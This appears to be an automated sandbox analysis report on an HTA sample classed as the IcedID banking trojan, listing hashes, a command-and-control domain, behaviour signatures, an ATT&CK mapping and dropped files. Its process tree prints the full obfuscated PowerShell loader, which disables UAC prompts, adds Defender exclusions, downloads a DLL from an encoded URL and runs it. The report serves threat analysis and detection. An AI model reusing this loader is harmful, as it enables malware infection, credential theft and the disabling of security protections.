Overview

overview

10

Static

static

etest.hta

windows7_x64

10

etest.hta

windows10-2004_x64

10

Analysis

  • max time kernel
    599s
  • max time network
    611s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    23-06-2022 16:06

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    etest.hta

  • Size

    99KB

  • MD5

    84df3cea303f0410a2a70580b9155bf5

  • SHA1

    987eed81fa0822853cb9f826994e75102e086694

  • SHA256

    248b6a65b656872525904122e75bd374b772e27c2a8fc6040ec6582fd207e536

  • SHA512

    610b39ec2989225794d0b12ef451bddc4bc4f3f77cd2159d9396ca425524256f17ea12b17957070a94704b5aa1a0b5fe5f915dd9d3c610aecc767315e1977616

Score
10/10
icedid3289900935bankerevasionloadersuricatatrojan

Malware Config

Extracted

Family

icedid

Campaign

3289900935

C2

ilzenhwery.com

Signatures

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

    trojanbankericedid
  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • suricata: ET MALWARE Win32/IcedID Request Cookie

    suricata: ET MALWARE Win32/IcedID Request Cookie

    suricata
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\etest.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3792
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function BpCExIjDrdGi($nnVDyzh, $cfMRXTCG){[IO.File]::WriteAllBytes($nnVDyzh, $cfMRXTCG)};function BgqJOAPBzie($nnVDyzh){if($nnVDyzh.EndsWith((fibYakKGHnxcX @(66842,66896,66904,66904))) -eq $True){rundll32.exe $nnVDyzh ,RunObject }elseif($nnVDyzh.EndsWith((fibYakKGHnxcX @(66842,66908,66911,66845))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $nnVDyzh}else{Start-Process $nnVDyzh}};function YDwYoXfkvCiX($BUsiXmWVUTyBGlhNN){$uTDDSkKDrMcCukgsB = New-Object (fibYakKGHnxcX @(66874,66897,66912,66842,66883,66897,66894,66863,66904,66901,66897,66906,66912));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cfMRXTCG = $uTDDSkKDrMcCukgsB.DownloadData($BUsiXmWVUTyBGlhNN);return $cfMRXTCG};function fibYakKGHnxcX($ZPSYkAbHDFF){$vRDpSXA=66796;$ifTikh=$Null;foreach($efauSZiRIFLSvo in $ZPSYkAbHDFF){$ifTikh+=[char]($efauSZiRIFLSvo-$vRDpSXA)};return $ifTikh};function KTcwOeFIaImkX(){$kyNirfktEagoeXnmMr = $env:AppData + '\';Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;$nGDxbpOvNNZvVHtpfa=$env:AppData; Add-MpPreference -ExclusionPath $nGDxbpOvNNZvVHtpfa;Add-MpPreference -ExclusionExtension ?lnk?;$PkAZgfWOTxnZ = $kyNirfktEagoeXnmMr + 'test.dll'; if (Test-Path -Path $PkAZgfWOTxnZ){BgqJOAPBzie $PkAZgfWOTxnZ;}Else{ $SpgGVjW = YDwYoXfkvCiX (fibYakKGHnxcX @(66900,66912,66912,66908,66911,66854,66843,66843,66915,66893,66906,66899,66841,66896,66893,66912,66893,66841,66911,66895,66901,66897,66906,66895,66897,66842,66895,66907,66905,66843,66915,66908,66841,66895,66907,66906,66912,66897,66906,66912,66843,66912,66900,66897,66905,66897,66911,66843,66911,66895,66893,66908,66897,66911,66900,66907,66912,66843,66912,66897,66911,66912,66842,66896,66904,66904));BpCExIjDrdGi $PkAZgfWOTxnZ $SpgGVjW;BgqJOAPBzie $PkAZgfWOTxnZ;};;;;}KTcwOeFIaImkX;" uac
      2⤵
      • UAC bypass
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1896
      • C:\Windows\SysWOW64\rundll32.exe
        "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\test.dll RunObject
        3⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:4932
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\test.dll RunObject
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          PID:4072

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Bypass User Account Control

1
T1088

Defense Evasion

Bypass User Account Control

1
T1088

Disabling Security Tools

1
T1089

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\test.dll
    Filesize

    858KB

    MD5

    f0b052dad1a3605cd3e6d044cd315388

    SHA1

    fe3d8f50b494f400bd47842d580343f38be6a04b

    SHA256

    4798655c9e1df924b92d224c53dce0e3e9028318a5fa6ee4e6bd9f0f32154cdd

    SHA512

    c8ee79ae9739c1486f0a89039b69afa6057d34bf39d2be58187d265662066c052776627fa58aa519e98c072704437fc3eaa190923e351414ef9a149509ff716b

    Download Submit
  • C:\Users\Admin\AppData\Roaming\test.dll
    Filesize

    858KB

    MD5

    f0b052dad1a3605cd3e6d044cd315388

    SHA1

    fe3d8f50b494f400bd47842d580343f38be6a04b

    SHA256

    4798655c9e1df924b92d224c53dce0e3e9028318a5fa6ee4e6bd9f0f32154cdd

    SHA512

    c8ee79ae9739c1486f0a89039b69afa6057d34bf39d2be58187d265662066c052776627fa58aa519e98c072704437fc3eaa190923e351414ef9a149509ff716b

    Download Submit
  • C:\Users\Admin\AppData\Roaming\test.dll
    Filesize

    858KB

    MD5

    f0b052dad1a3605cd3e6d044cd315388

    SHA1

    fe3d8f50b494f400bd47842d580343f38be6a04b

    SHA256

    4798655c9e1df924b92d224c53dce0e3e9028318a5fa6ee4e6bd9f0f32154cdd

    SHA512

    c8ee79ae9739c1486f0a89039b69afa6057d34bf39d2be58187d265662066c052776627fa58aa519e98c072704437fc3eaa190923e351414ef9a149509ff716b

    Download Submit
  • memory/1896-142-0x0000000073310000-0x000000007335C000-memory.dmp
    Filesize

    304KB

    Download
  • memory/1896-144-0x00000000083D0000-0x0000000008A4A000-memory.dmp
    Filesize

    6.5MB

    Download
  • memory/1896-135-0x00000000058E0000-0x0000000005946000-memory.dmp
    Filesize

    408KB

    Download
  • memory/1896-136-0x0000000005EF0000-0x0000000005F0E000-memory.dmp
    Filesize

    120KB

    Download
  • memory/1896-137-0x0000000006F50000-0x0000000006FE6000-memory.dmp
    Filesize

    600KB

    Download
  • memory/1896-138-0x0000000006450000-0x000000000646A000-memory.dmp
    Filesize

    104KB

    Download
  • memory/1896-139-0x00000000064C0000-0x00000000064E2000-memory.dmp
    Filesize

    136KB

    Download
  • memory/1896-140-0x00000000077A0000-0x0000000007D44000-memory.dmp
    Filesize

    5.6MB

    Download
  • memory/1896-141-0x00000000072B0000-0x00000000072E2000-memory.dmp
    Filesize

    200KB

    Download
  • memory/1896-130-0x0000000000000000-mapping.dmp
    Download
  • memory/1896-143-0x0000000007290000-0x00000000072AE000-memory.dmp
    Filesize

    120KB

    Download
  • memory/1896-134-0x0000000005870000-0x00000000058D6000-memory.dmp
    Filesize

    408KB

    Download
  • memory/1896-145-0x0000000007480000-0x000000000748A000-memory.dmp
    Filesize

    40KB

    Download
  • memory/1896-146-0x0000000007630000-0x000000000763E000-memory.dmp
    Filesize

    56KB

    Download
  • memory/1896-147-0x0000000007690000-0x00000000076AA000-memory.dmp
    Filesize

    104KB

    Download
  • memory/1896-148-0x0000000007680000-0x0000000007688000-memory.dmp
    Filesize

    32KB

    Download
  • memory/1896-131-0x0000000002620000-0x0000000002656000-memory.dmp
    Filesize

    216KB

    Download
  • memory/1896-133-0x0000000004F90000-0x0000000004FB2000-memory.dmp
    Filesize

    136KB

    Download
  • memory/1896-132-0x0000000005150000-0x0000000005778000-memory.dmp
    Filesize

    6.2MB

    Download
  • memory/4072-152-0x0000000000000000-mapping.dmp
    Download
  • memory/4072-154-0x0000000180000000-0x0000000180009000-memory.dmp
    Filesize

    36KB

    Download
  • memory/4932-149-0x0000000000000000-mapping.dmp
    Download